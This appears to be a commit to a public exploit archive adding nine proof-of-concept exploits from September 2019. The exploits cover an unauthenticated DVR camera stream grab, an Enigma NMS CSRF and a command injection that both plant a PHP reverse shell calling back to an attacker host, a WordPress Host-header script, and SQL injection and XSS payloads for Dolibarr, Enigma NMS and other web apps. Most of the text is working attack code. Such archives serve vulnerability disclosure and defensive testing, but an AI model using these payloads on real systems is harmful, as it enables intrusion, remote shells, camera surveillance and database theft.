DB: 2019-09-10
9 changes to exploits/shellcodes WordPress 5.2.3 - Cross-Site Host Modification Dolibarr ERP-CRM 10.0.1 - 'elemid' SQL Injection Enigma NMS 65.0.0 - Cross-Site Request Forgery Enigma NMS 65.0.0 - OS Command Injection Enigma NMS 65.0.0 - SQL Injection Online Appointment - SQL Injection Rifatron Intelligent Digital Security System - 'animate.cgi' Stream Disclosure WordPress Plugin Sell Downloads 1.0.86 - Cross-Site Scripting Dolibarr ERP-CRM 10.0.1 - SQL Injection
This commit is contained in:
parent
ad97ff4198
commit
fcce3705a3
10 changed files with 578 additions and 0 deletions
75
exploits/cgi/webapps/47368.sh
Executable file
75
exploits/cgi/webapps/47368.sh
Executable file
|
@ -0,0 +1,75 @@
|
||||||
|
#!/bin/bash
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# Rifatron Intelligent Digital Security System (animate.cgi) Stream Disclosure
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# Vendor: Rifatron Co., Ltd. | SAM MYUNG Co., Ltd.
|
||||||
|
# Product web page: http://www.rifatron.com
|
||||||
|
# Affected version: 5brid DVR (HD6-532/516, DX6-516/508/504, MX6-516/508/504, EH6-504)
|
||||||
|
# 7brid DVR (HD3-16V2, DX3-16V2/08V2/04V2, MX3-08V2/04V2)
|
||||||
|
# Firmware: <=8.0 (000143)
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# Summary: Rifatron with its roots in Seoul, Korea has been supplying and
|
||||||
|
# servicing the security market as a leading CCTV/video surveillance security
|
||||||
|
# system manufacturer, specializing in stand-alone digital video recorder since
|
||||||
|
# 1998. We are known for marking the first standalone DVR with audio detection
|
||||||
|
# and 480 frames per secone(fps) and have been focusing on highend products and
|
||||||
|
# large projects in a variety applications and merket. These include government
|
||||||
|
# and public services, banking and finance, hotels and entertatinment, retail
|
||||||
|
# education, industrial and commercial sectors throughout Europe, Middle East,
|
||||||
|
# the U.S. and Asia. Based on the accumulated know-how in the security industry,
|
||||||
|
# Rifatron is trying its utmost for the technology development and customer
|
||||||
|
# satisfaction to be the best security solution company in the world.
|
||||||
|
#
|
||||||
|
# Desc: The DVR suffers from an unauthenticated and unauthorized live stream
|
||||||
|
# disclosure when animate.cgi script is called through Mobile Web Viewer module.
|
||||||
|
#
|
||||||
|
# Tested on: Embedded Linux
|
||||||
|
# Boa/0.94.14rc21
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||||
|
# @zeroscience
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# Advisory ID: ZSL-2019-5532
|
||||||
|
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5532.php
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# 03.09.2019
|
||||||
|
#
|
||||||
|
|
||||||
|
#{PoC}
|
||||||
|
#
|
||||||
|
set -euo pipefail
|
||||||
|
IFS=$'\n\t'
|
||||||
|
if [ "$#" -ne 2 ]; then
|
||||||
|
echo "Usage: $0 IP:PORT CHANNEL" # Valid channel integers: 0-15
|
||||||
|
echo "Ex.: $0 10.9.8.7:65432 10"
|
||||||
|
exit
|
||||||
|
fi
|
||||||
|
IP=$1
|
||||||
|
CHANNEL=$2
|
||||||
|
HOST="http://$IP/cgi-bin/animate.cgi?$CHANNEL"
|
||||||
|
STATUS=$(curl -Is http://$IP/mobile_viewer_login.html 2>/dev/null | head -1 | awk -F" " '{print $2}')
|
||||||
|
if [ "$STATUS" == "404" ]; then
|
||||||
|
echo "Target not vulnerable!"
|
||||||
|
exit
|
||||||
|
fi
|
||||||
|
echo "Collecting snapshots..."
|
||||||
|
for x in {1..10};
|
||||||
|
do echo -ne $x
|
||||||
|
curl "$HOST" -o sequence-$x.jpg -#;
|
||||||
|
sleep 0.6
|
||||||
|
done
|
||||||
|
echo -ne "\nDone."
|
||||||
|
echo -ne "\nRendering video..."
|
||||||
|
ffmpeg -t 10 -v quiet -s 352x288 -r 1 -an -i sequence-%01d.jpg -c:v libx264 -vf fps=10 -pix_fmt yuvj422p video.mp4
|
||||||
|
echo " done."
|
||||||
|
echo -ne "\nRunning animation..."
|
||||||
|
sleep 1
|
||||||
|
cvlc video.mp4 --verbose -1 -f vlc://quit
|
||||||
|
#
|
||||||
|
#{/PoC}
|
69
exploits/multiple/webapps/47363.html
Normal file
69
exploits/multiple/webapps/47363.html
Normal file
|
@ -0,0 +1,69 @@
|
||||||
|
#--------------------------------------------------------------------#
|
||||||
|
# Exploit Title: Enigma NMS Cross-Site Request Forgery (CSRF) #
|
||||||
|
# Date: 21 July 2019 #
|
||||||
|
# Author: Mark Cross (@xerubus | mogozobo.com) #
|
||||||
|
# Vendor: NETSAS Pty Ltd #
|
||||||
|
# Vendor Homepage: https://www.netsas.com.au/ #
|
||||||
|
# Software Link: https://www.netsas.com.au/enigma-nms-introduction/ #
|
||||||
|
# Version: Enigma NMS 65.0.0 #
|
||||||
|
# CVE-IDs: CVE-2019-16068 #
|
||||||
|
# Full write-up: https://www.mogozobo.com/?p=3647 #
|
||||||
|
#--------------------------------------------------------------------#
|
||||||
|
_ _
|
||||||
|
___ (~ )( ~)
|
||||||
|
/ \_\ \/ /
|
||||||
|
| D_ ]\ \/ -= Enigma CSRF by @xerubus =-
|
||||||
|
| D _]/\ \ -= We all have something to hide =-
|
||||||
|
\___/ / /\ \\
|
||||||
|
(_ )( _)
|
||||||
|
@Xerubus
|
||||||
|
|
||||||
|
The following CSRF will create a PHP file for executing a reverse shell on port 1337 via the user upload functionality within the NMS web application.
|
||||||
|
|
||||||
|
<html>
|
||||||
|
<script>history.pushState('', '', '/')</script>
|
||||||
|
<script>
|
||||||
|
function submitRequest()
|
||||||
|
{
|
||||||
|
var xhr = new XMLHttpRequest();
|
||||||
|
xhr.open("POST", "http:\/\/<enigma_nms_ipaddr>\/cgi-bin\/protected\/manage_files.cgi", true);
|
||||||
|
xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
|
||||||
|
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
|
||||||
|
xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------208051173310446317141640314495");
|
||||||
|
xhr.withCredentials = true;
|
||||||
|
|
||||||
|
var body = "-----------------------------208051173310446317141640314495\r\n" +
|
||||||
|
"Content-Disposition: form-data; name=\"action\"\r\n" +
|
||||||
|
"\r\n" +
|
||||||
|
"system_upgrade\r\n" +
|
||||||
|
"-----------------------------208051173310446317141640314495\r\n" +
|
||||||
|
"Content-Disposition: form-data; name=\"action_aux\"\r\n" +
|
||||||
|
"\r\n" +
|
||||||
|
"upload_file_complete\r\n" +
|
||||||
|
"-----------------------------208051173310446317141640314495\r\n" +
|
||||||
|
"Content-Disposition: form-data; name=\"upfile\"; filename=\"evil.php\"\r\n" +
|
||||||
|
"Content-Type: application/x-php\r\n" +
|
||||||
|
"\r\n" +
|
||||||
|
"\x3c?php\n" +
|
||||||
|
"\n" +
|
||||||
|
"exec(\"/bin/bash -c \'bash -i \x3e& /dev/tcp/<attacking_host_ipaddr>/1337 0\x3e&1\'\");\n" +
|
||||||
|
"\n" +
|
||||||
|
"?\x3e\n" +
|
||||||
|
"\r\n" +
|
||||||
|
"-----------------------------208051173310446317141640314495\r\n" +
|
||||||
|
"Content-Disposition: form-data; name=\"upfile_name\"\r\n" +
|
||||||
|
"\r\n" +
|
||||||
|
"evil.php\r\n" +
|
||||||
|
"-----------------------------208051173310446317141640314495--\r\n";
|
||||||
|
|
||||||
|
var aBody = new Uint8Array(body.length);
|
||||||
|
for (var i = 0; i < aBody.length; i++)
|
||||||
|
aBody[i] = body.charCodeAt(i);
|
||||||
|
xhr.send(new Blob([aBody]));
|
||||||
|
}
|
||||||
|
submitRequest();
|
||||||
|
window.location='http://<enigma_nms_ipaddr>/cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser';
|
||||||
|
</script>
|
||||||
|
<body onload="submitRequest();" >
|
||||||
|
</body>
|
||||||
|
</html>
|
66
exploits/multiple/webapps/47364.py
Executable file
66
exploits/multiple/webapps/47364.py
Executable file
|
@ -0,0 +1,66 @@
|
||||||
|
#!/usr/bin/python
|
||||||
|
#--------------------------------------------------------------------#
|
||||||
|
# Exploit Title: Enigma NMS OS Command Injection #
|
||||||
|
# NETSAS Pty Ltd Enigma NMS #
|
||||||
|
# Date: 21 July 2019 #
|
||||||
|
# Author: Mark Cross (@xerubus | mogozobo.com) #
|
||||||
|
# Vendor: NETSAS Pty Ltd #
|
||||||
|
# Vendor Homepage: https://www.netsas.com.au/ #
|
||||||
|
# Software Link: https://www.netsas.com.au/enigma-nms-introduction/ #
|
||||||
|
# Version: Enigma NMS 65.0.0 #
|
||||||
|
# CVE-IDs: CVE-2019-16072 #
|
||||||
|
# Full write-up: https://www.mogozobo.com/?p=3647 #
|
||||||
|
#--------------------------------------------------------------------#
|
||||||
|
|
||||||
|
import sys, time, os, subprocess, signal, requests, socket, SocketServer, SimpleHTTPServer, threading
|
||||||
|
|
||||||
|
os.system('clear')
|
||||||
|
|
||||||
|
print("""\
|
||||||
|
_ _
|
||||||
|
___ (~ )( ~)
|
||||||
|
/ \_\ \/ /
|
||||||
|
| D_ ]\ \/ -= Enigma NMS Reverse Shell by @xerubus =-
|
||||||
|
| D _]/\ \ -= We all have something to hide =-
|
||||||
|
\___/ / /\ \\
|
||||||
|
(_ )( _)
|
||||||
|
@Xerubus
|
||||||
|
""")
|
||||||
|
|
||||||
|
enigma_host = raw_input("Enter Enigma NMS IP address:\t")
|
||||||
|
attack_host = raw_input("Enter Attacker IP address:\t")
|
||||||
|
rev_sh_port = raw_input("Enter reverse shell port:\t")
|
||||||
|
web_svr_port = raw_input("Enter web server port:\t\t")
|
||||||
|
user = raw_input("Enter Username:\t\t\t")
|
||||||
|
os.system("stty -echo")
|
||||||
|
password = raw_input("Enter Password (no echo):\t")
|
||||||
|
os.system("stty echo")
|
||||||
|
|
||||||
|
enigma_url = "http://" + enigma_host + "/cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser&hst_id=none&snmpv3_profile_id=&ip_address=|curl%20" + attack_host + ":" + web_svr_port + "/evil.php|php&snmp_ro_string=public&mib_oid=system&mib_oid_manual=.1.3.6.1.2.1.1&snmp_version=1"
|
||||||
|
enigma_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "http://" + attack_host + "/cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
|
||||||
|
|
||||||
|
print "\n\n[+] Building PHP reverse shell"
|
||||||
|
f=open("evil.php","w")
|
||||||
|
f.write("<?php\nexec(\"/bin/bash -c \'bash -i >& /dev/tcp/" + attack_host + "/" + rev_sh_port + " 0>&1\'\");\n?>\n")
|
||||||
|
f.close()
|
||||||
|
|
||||||
|
# Create simple webserver hosting evil php file
|
||||||
|
print "[+] Hosting PHP reverse shell"
|
||||||
|
web_svr_port = str(web_svr_port)
|
||||||
|
web_svr = subprocess.Popen(["python", "-m", "SimpleHTTPServer", web_svr_port], stdout=subprocess.PIPE, shell=False, preexec_fn=os.setsid)
|
||||||
|
|
||||||
|
# Create netcat listener
|
||||||
|
print "[+] Creating listener on port " + rev_sh_port
|
||||||
|
subprocess.Popen(["nc", "-nvlp", rev_sh_port])
|
||||||
|
|
||||||
|
# Send payload to Enigma NMS
|
||||||
|
print "[+] Sending payload\n"
|
||||||
|
try:
|
||||||
|
r = requests.get(enigma_url, headers=enigma_headers, auth=(user, password))
|
||||||
|
except:
|
||||||
|
pass
|
||||||
|
|
||||||
|
print "\n[+] Cleaning up mess..."
|
||||||
|
|
||||||
|
# Shut down http server
|
||||||
|
os.killpg(os.getpgid(web_svr.pid), signal.SIGTERM)
|
23
exploits/multiple/webapps/47365.txt
Normal file
23
exploits/multiple/webapps/47365.txt
Normal file
|
@ -0,0 +1,23 @@
|
||||||
|
#--------------------------------------------------------------------#
|
||||||
|
# Exploit Title: Enigma NMS search_pattern SQL Injection #
|
||||||
|
# Date: 21 July 2019 #
|
||||||
|
# Author: Mark Cross (@xerubus | mogozobo.com) #
|
||||||
|
# Vendor: NETSAS Pty Ltd #
|
||||||
|
# Vendor Homepage: https://www.netsas.com.au/ #
|
||||||
|
# Software Link: https://www.netsas.com.au/enigma-nms-introduction/ #
|
||||||
|
# Version: Enigma NMS 65.0.0 #
|
||||||
|
# CVE-IDs: CVE-2019-16065 #
|
||||||
|
# Full write-up: https://www.mogozobo.com/?p=3647 #
|
||||||
|
#--------------------------------------------------------------------#
|
||||||
|
_ _
|
||||||
|
___ (~ )( ~)
|
||||||
|
/ \_\ \/ /
|
||||||
|
| D_ ]\ \/ -= Enigma SQLi by @xerubus =-
|
||||||
|
| D _]/\ \ -= We all have something to hide =-
|
||||||
|
\___/ / /\ \\
|
||||||
|
(_ )( _)
|
||||||
|
@Xerubus
|
||||||
|
|
||||||
|
Request: http://<enigma_nms_ipaddr>/cgi-bin/protected/manage_hosts_short.cgi?action=search_proceed&search_pattern=
|
||||||
|
Vulnerable Parameter: search_pattern (GET)
|
||||||
|
Payload: action=search_proceed&search_pattern=a%' AND SLEEP(5) AND '%'='
|
91
exploits/php/webapps/47361.pl
Executable file
91
exploits/php/webapps/47361.pl
Executable file
|
@ -0,0 +1,91 @@
|
||||||
|
#!/usr/bin/perl -w
|
||||||
|
#
|
||||||
|
# Wordpress <= 5.2.3 Remote Cross Site Host Modification Proof Of Concept Demo Exploit
|
||||||
|
#
|
||||||
|
# Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
|
||||||
|
#
|
||||||
|
# Type: Remote
|
||||||
|
# Risk: High
|
||||||
|
#
|
||||||
|
# Solution:
|
||||||
|
# Set security headers to web server and no-cache for Cache-Control
|
||||||
|
#
|
||||||
|
# Simple Attack Scenarios:
|
||||||
|
#
|
||||||
|
# o This attack can bypass Simple WAF to access restricted content on the web server,
|
||||||
|
# something like phpMyAdmin;
|
||||||
|
#
|
||||||
|
# o This attack can deface the vulnerable Wordpress website with content from the default vhost;
|
||||||
|
#
|
||||||
|
# Disclaimer:
|
||||||
|
# This or previous programs are for Educational purpose ONLY. Do not use it without permission.
|
||||||
|
# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages
|
||||||
|
# caused by direct or indirect use of the information or functionality provided by these programs.
|
||||||
|
# The author or any Internet provider bears NO responsibility for content or misuse of these programs
|
||||||
|
# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
|
||||||
|
# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's
|
||||||
|
# responsibility.
|
||||||
|
#
|
||||||
|
# Use them at your own risk!
|
||||||
|
#
|
||||||
|
# # Wordpress <= 5.2.3 Remote Cross Site Host Modification Proof Of Concept Demo Exploit
|
||||||
|
# # ====================================================================================
|
||||||
|
# # Author: Todor Donev 2019 (c) <todor.donev at gmail.com>
|
||||||
|
# # > Host => default-vhost.com
|
||||||
|
# # > User-Agent => Mozilla/5.0 (compatible; Konqueror/3.5; NetBSD 4.0_RC3; X11) KHTML/3.5.7 (like Gecko)
|
||||||
|
# # > Content-Type => application/x-www-form-urlencoded
|
||||||
|
# # < Connection => close
|
||||||
|
# # < Date => Fri, 06 Sep 2019 11:39:43 GMT
|
||||||
|
# # < Location => https://default-vhost.com/
|
||||||
|
# # < Server => nginx
|
||||||
|
# # < Content-Type => text/html; charset=UTF-8
|
||||||
|
# # < Client-Date => Fri, 06 Sep 2019 11:39:43 GMT
|
||||||
|
# # < Client-Peer => 13.37.13.37:443
|
||||||
|
# # < Client-Response-Num => 1
|
||||||
|
# # < Client-SSL-Cert-Issuer => /C=US/O=Let's Encrypt/CN=Let's Encrypt Authority X3
|
||||||
|
# # < Client-SSL-Cert-Subject => /CN=default-vhost.com
|
||||||
|
# # < Client-SSL-Cipher => ECDHE-RSA-AES256-GCM-SHA384
|
||||||
|
# # < Client-SSL-Socket-Class => IO::Socket::SSL
|
||||||
|
# # < Client-SSL-Warning => Peer certificate not verified
|
||||||
|
# # < Client-Transfer-Encoding => chunked
|
||||||
|
# # < Strict-Transport-Security => max-age=31536000;
|
||||||
|
# # < X-Powered-By => PHP/7.3.9
|
||||||
|
# # < X-Redirect-By => WordPress
|
||||||
|
# # ====================================================================================
|
||||||
|
#
|
||||||
|
#
|
||||||
|
#
|
||||||
|
use strict;
|
||||||
|
use v5.10;
|
||||||
|
use HTTP::Request;
|
||||||
|
use LWP::UserAgent;
|
||||||
|
use WWW::UserAgent::Random;
|
||||||
|
|
||||||
|
|
||||||
|
my $host = shift || '';
|
||||||
|
my $attacker = shift || 'default-vhost.com';
|
||||||
|
|
||||||
|
|
||||||
|
say "# Wordpress <= 5.2.3 Remote Cross Site Host Modification Proof Of Concept Demo Exploit
|
||||||
|
# ====================================================================================
|
||||||
|
# Author: Todor Donev 2019 (c) <todor.donev at gmail.com>";
|
||||||
|
if ($host !~ m/^http/){
|
||||||
|
say "# e.g. perl $0 https://target:port/ default-vhost.com";
|
||||||
|
exit;
|
||||||
|
}
|
||||||
|
|
||||||
|
my $user_agent = rand_ua("browsers");
|
||||||
|
my $browser = LWP::UserAgent->new(
|
||||||
|
protocols_allowed => ['http', 'https'],
|
||||||
|
ssl_opts => { verify_hostname => 0 }
|
||||||
|
);
|
||||||
|
$browser->timeout(10);
|
||||||
|
$browser->agent($user_agent);
|
||||||
|
|
||||||
|
my $request = HTTP::Request->new (POST => $host,[Content_Type => "application/x-www-form-urlencoded"], " ");
|
||||||
|
$request->header("Host" => $attacker);
|
||||||
|
my $response = $browser->request($request);
|
||||||
|
say "# 401 Unauthorized!\n" and exit if ($response->code eq '401');
|
||||||
|
say "# > $_ => ", $request->header($_) for $request->header_field_names;
|
||||||
|
say "# < $_ => ", $response->header($_) for $response->header_field_names;
|
||||||
|
say "# ====================================================================================";
|
49
exploits/php/webapps/47362.txt
Normal file
49
exploits/php/webapps/47362.txt
Normal file
|
@ -0,0 +1,49 @@
|
||||||
|
# Exploit Title: Dolibarr ERP/CRM - elemid Sql Injection
|
||||||
|
# Exploit Author: Metin Yunus Kandemir (kandemir)
|
||||||
|
# Vendor Homepage: https://www.dolibarr.org/
|
||||||
|
# Software Link: https://www.dolibarr.org/downloads
|
||||||
|
# Version: 10.0.1
|
||||||
|
# Category: Webapps
|
||||||
|
# Tested on: Xampp for Linux
|
||||||
|
# Software Description : Dolibarr ERP & CRM is a modern and easy to use
|
||||||
|
software package to manage your business...
|
||||||
|
==================================================================
|
||||||
|
|
||||||
|
|
||||||
|
elemid (POST) - Sql injection PoC
|
||||||
|
|
||||||
|
|
||||||
|
POST /dolibarr-10.0.1/htdocs/categories/viewcat.php HTTP/1.1
|
||||||
|
Host: localhost
|
||||||
|
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101
|
||||||
|
Firefox/60.0
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||||
|
Accept-Language: en-US,en;q=0.5
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Referer:
|
||||||
|
http://localhost/dolibarr-10.0.1/htdocs/categories/viewcat.php?id=102&type=product&backtopage=%2Fdolibarr-10.0.1%2Fhtdocs%2Fcategories%2Findex.php
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
Content-Length: 143
|
||||||
|
Cookie:
|
||||||
|
DOLSESSID_60ec554596b730ca6f03816d85cd400a=149432620a831537e75f713330bb0b45
|
||||||
|
Connection: close
|
||||||
|
Upgrade-Insecure-Requests: 1
|
||||||
|
|
||||||
|
token=%242y%2410%24WgwCdl0XwjnGlV3qpQ%2F7zeLEp%2FXFVVoWaj17gXqY2nYZFvG1dlzsS&typeid=product&type=product&id=102&action=addintocategory&elemid=[SQLi]
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Parameter: elemid (POST)
|
||||||
|
Type: error-based
|
||||||
|
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP
|
||||||
|
BY clause (EXTRACTVALUE)
|
||||||
|
Payload:
|
||||||
|
token=$2y$10$WgwCdl0XwjnGlV3qpQ/7zeLEp/XFVVoWaj17gXqY2nYZFvG1dlzsS&typeid=product&type=product&id=102&action=addintocategory&elemid=0
|
||||||
|
AND EXTRACTVALUE(7549,CONCAT(0x5c,0x71706a7171,(SELECT
|
||||||
|
(ELT(7549=7549,1))),0x7176787a71))
|
||||||
|
|
||||||
|
Type: time-based blind
|
||||||
|
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
|
||||||
|
Payload:
|
||||||
|
token=$2y$10$WgwCdl0XwjnGlV3qpQ/7zeLEp/XFVVoWaj17gXqY2nYZFvG1dlzsS&typeid=product&type=product&id=102&action=addintocategory&elemid=0
|
||||||
|
AND (SELECT 6353 FROM (SELECT(SLEEP(5)))aOzn)
|
39
exploits/php/webapps/47366.txt
Normal file
39
exploits/php/webapps/47366.txt
Normal file
|
@ -0,0 +1,39 @@
|
||||||
|
# Exploit Title: Online Appointment SQL Injection
|
||||||
|
# Data: 07.09.2019
|
||||||
|
# Exploit Author: mohammad zaheri
|
||||||
|
# Vendor HomagePage: https://github.com/girish03/Online-Appointment-Booking-System
|
||||||
|
# Tested on: Windows
|
||||||
|
# Google Dork: N/A
|
||||||
|
|
||||||
|
|
||||||
|
=========
|
||||||
|
Vulnerable Page:
|
||||||
|
=========
|
||||||
|
Online-Appointment-Booking-System-master/signup.php
|
||||||
|
|
||||||
|
|
||||||
|
==========
|
||||||
|
Vulnerable Source:
|
||||||
|
==========
|
||||||
|
Line 52: $name=$_POST['fname'];
|
||||||
|
Line 53: $gender=$_POST['gender'];
|
||||||
|
Line 54: $dob=$_POST['dob'];
|
||||||
|
Line 55: $contact=$_POST['contact'];
|
||||||
|
Line 56: $email=$_POST['email'];
|
||||||
|
Line 57: $username=$_POST['username'];
|
||||||
|
Line 58: $password=$_POST['pwd'];
|
||||||
|
Line 59: $prepeat=$_POST['pwdr'];
|
||||||
|
Line 62: if (mysqli_query($conn, $sql))
|
||||||
|
|
||||||
|
=========
|
||||||
|
POC:
|
||||||
|
=========
|
||||||
|
http://site.com/Online-Appointment-Booking-System-master/signup.php?sql=[SQL]
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
=========
|
||||||
|
Contact Me :
|
||||||
|
=========
|
||||||
|
Telegram : @m_zhrii
|
||||||
|
Email : neoboy503@gmail.com
|
17
exploits/php/webapps/47369.txt
Normal file
17
exploits/php/webapps/47369.txt
Normal file
|
@ -0,0 +1,17 @@
|
||||||
|
# Exploit Title: WordPress Plugin Sell Downloads 1.0.86 - Cross Site Scripting
|
||||||
|
# Exploit Author: Mr Winst0n
|
||||||
|
# Author E-mail: manamtabeshekan@gmail.com
|
||||||
|
# Discovery Date: September 09,2019
|
||||||
|
# Vendor Homepage: https://wordpress.dwbooster.com/content-tools/sell-downloads
|
||||||
|
# Software Link : https://wordpress.org/plugins/sell-downloads/
|
||||||
|
# Tested Version: 1.0.86
|
||||||
|
# Tested on: Parrot OS, Wordpress 5.1.1
|
||||||
|
|
||||||
|
|
||||||
|
# PoC:
|
||||||
|
1- Go to "Products for Sale" section
|
||||||
|
2- Click on "Add New"
|
||||||
|
3- In opend window click on "Add Comment"
|
||||||
|
4- Fill comment as "/><img src=x onerror="alert()"> or "/><input type="text" onclick="alert()">
|
||||||
|
5- Click on "Publish" (or "Update" if you editing an existing product)
|
||||||
|
6- You will see a pop-up (also if click on input), Also if you go to product link will see the pop-up.
|
140
exploits/php/webapps/47370.txt
Normal file
140
exploits/php/webapps/47370.txt
Normal file
|
@ -0,0 +1,140 @@
|
||||||
|
# Exploit Title: Dolibarr ERP/CRM - Multiple Sql Injection
|
||||||
|
# Exploit Author: Metin Yunus Kandemir (kandemir)
|
||||||
|
# Vendor Homepage: https://www.dolibarr.org/
|
||||||
|
# Software Link: https://www.dolibarr.org/downloads
|
||||||
|
# Version: 10.0.1
|
||||||
|
# Category: Webapps
|
||||||
|
# Tested on: Xampp for Linux
|
||||||
|
# Software Description : Dolibarr ERP & CRM is a modern and easy to use
|
||||||
|
software package to manage your business...
|
||||||
|
==================================================================
|
||||||
|
|
||||||
|
|
||||||
|
actioncode (POST) - Sql injection PoC
|
||||||
|
|
||||||
|
http request:
|
||||||
|
|
||||||
|
POST /dolibarr-10.0.1/htdocs/comm/action/card.php HTTP/1.1
|
||||||
|
Host: localhost
|
||||||
|
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101
|
||||||
|
Firefox/60.0
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||||
|
Accept-Language: en-US,en;q=0.5
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Referer:
|
||||||
|
http://localhost/dolibarr-10.0.1/htdocs/comm/action/card.php?action=edit&id=774
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
Content-Length: 610
|
||||||
|
Cookie:
|
||||||
|
DOLSESSID_60ec554596b730ca6f03816d85cd400a=aaf3a3b284478257b59be81cf1a70fc3
|
||||||
|
Connection: close
|
||||||
|
Upgrade-Insecure-Requests: 1
|
||||||
|
|
||||||
|
token=%242y%2410%24hG2u8WGSj3ynCl99dYPZGejK322YaCxkfSRW%2FIC0mt8vk7%2FGTtU8a&action=update&id=774&ref_ext=&actioncode=[SQLi]&label=Product+created&ap=09%2F05%2F2019&apday=05&apmonth=09&apyear=2019&aphour=16&apmin=59&apsec=10&p2=09%2F05%2F2019&p2day=05&p2month=09&p2year=2019&p2hour=16&p2min=59&p2sec=10&complete=-1&location=&removedassigned=&assignedtouser=-1&socid=-1&projectid=0&priority=&fk_element=178&elementtype=product¬e=Author%3A+admin%3Cbr%3E%0D%0AProduct+created&edit=Save
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Parameter: actioncode (POST)
|
||||||
|
Type: boolean-based blind
|
||||||
|
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or
|
||||||
|
GROUP BY clause
|
||||||
|
Payload:
|
||||||
|
token=$2y$10$hG2u8WGSj3ynCl99dYPZGejK322YaCxkfSRW/IC0mt8vk7/GTtU8a&action=update&id=774&ref_ext=&actioncode=AC_OTH_AUTO'
|
||||||
|
RLIKE (SELECT (CASE WHEN (5096=5096) THEN 0x41435f4f54485f4155544f ELSE
|
||||||
|
0x28 END))--
|
||||||
|
HQaG&label=Product+created&ap=09/05/2019&apday=05&apmonth=09&apyear=2019&aphour=16&apmin=59&apsec=10&p2=09/05/2019&p2day=05&p2month=09&p2year=2019&p2hour=16&p2min=59&p2sec=10&complete=-1&location=&removedassigned=&assignedtouser=-1&socid=-1&projectid=0&priority=&fk_element=178&elementtype=product¬e=Author%3A+admin%3Cbr%3E%0D%0AProduct+created&edit=Save
|
||||||
|
|
||||||
|
Type: error-based
|
||||||
|
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
|
||||||
|
BY clause (FLOOR)
|
||||||
|
Payload:
|
||||||
|
token=$2y$10$hG2u8WGSj3ynCl99dYPZGejK322YaCxkfSRW/IC0mt8vk7/GTtU8a&action=update&id=774&ref_ext=&actioncode=AC_OTH_AUTO'
|
||||||
|
AND (SELECT 1665 FROM(SELECT COUNT(*),CONCAT(0x716b707871,(SELECT
|
||||||
|
(ELT(1665=1665,1))),0x7170707071,FLOOR(RAND(0)*2))x FROM
|
||||||
|
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)--
|
||||||
|
XqJd&label=Product+created&ap=09/05/2019&apday=05&apmonth=09&apyear=2019&aphour=16&apmin=59&apsec=10&p2=09/05/2019&p2day=05&p2month=09&p2year=2019&p2hour=16&p2min=59&p2sec=10&complete=-1&location=&removedassigned=&assignedtouser=-1&socid=-1&projectid=0&priority=&fk_element=178&elementtype=product¬e=Author%3A+admin%3Cbr%3E%0D%0AProduct+created&edit=Save
|
||||||
|
|
||||||
|
Type: time-based blind
|
||||||
|
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
|
||||||
|
Payload:
|
||||||
|
token=$2y$10$hG2u8WGSj3ynCl99dYPZGejK322YaCxkfSRW/IC0mt8vk7/GTtU8a&action=update&id=774&ref_ext=&actioncode=AC_OTH_AUTO'
|
||||||
|
AND (SELECT 6833 FROM (SELECT(SLEEP(5)))gCwf)--
|
||||||
|
jPLl&label=Product+created&ap=09/05/2019&apday=05&apmonth=09&apyear=2019&aphour=16&apmin=59&apsec=10&p2=09/05/2019&p2day=05&p2month=09&p2year=2019&p2hour=16&p2min=59&p2sec=10&complete=-1&location=&removedassigned=&assignedtouser=-1&socid=-1&projectid=0&priority=&fk_element=178&elementtype=product¬e=Author%3A+admin%3Cbr%3E%0D%0AProduct+created&edit=Save
|
||||||
|
|
||||||
|
.
|
||||||
|
.
|
||||||
|
.
|
||||||
|
.
|
||||||
|
.
|
||||||
|
|
||||||
|
demand_reason_id, availability_id (POST) - Sql injection PoC
|
||||||
|
|
||||||
|
http request:
|
||||||
|
|
||||||
|
POST /dolibarr-10.0.1/htdocs/comm/propal/card.php HTTP/1.1
|
||||||
|
Host: localhost
|
||||||
|
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101
|
||||||
|
Firefox/60.0
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
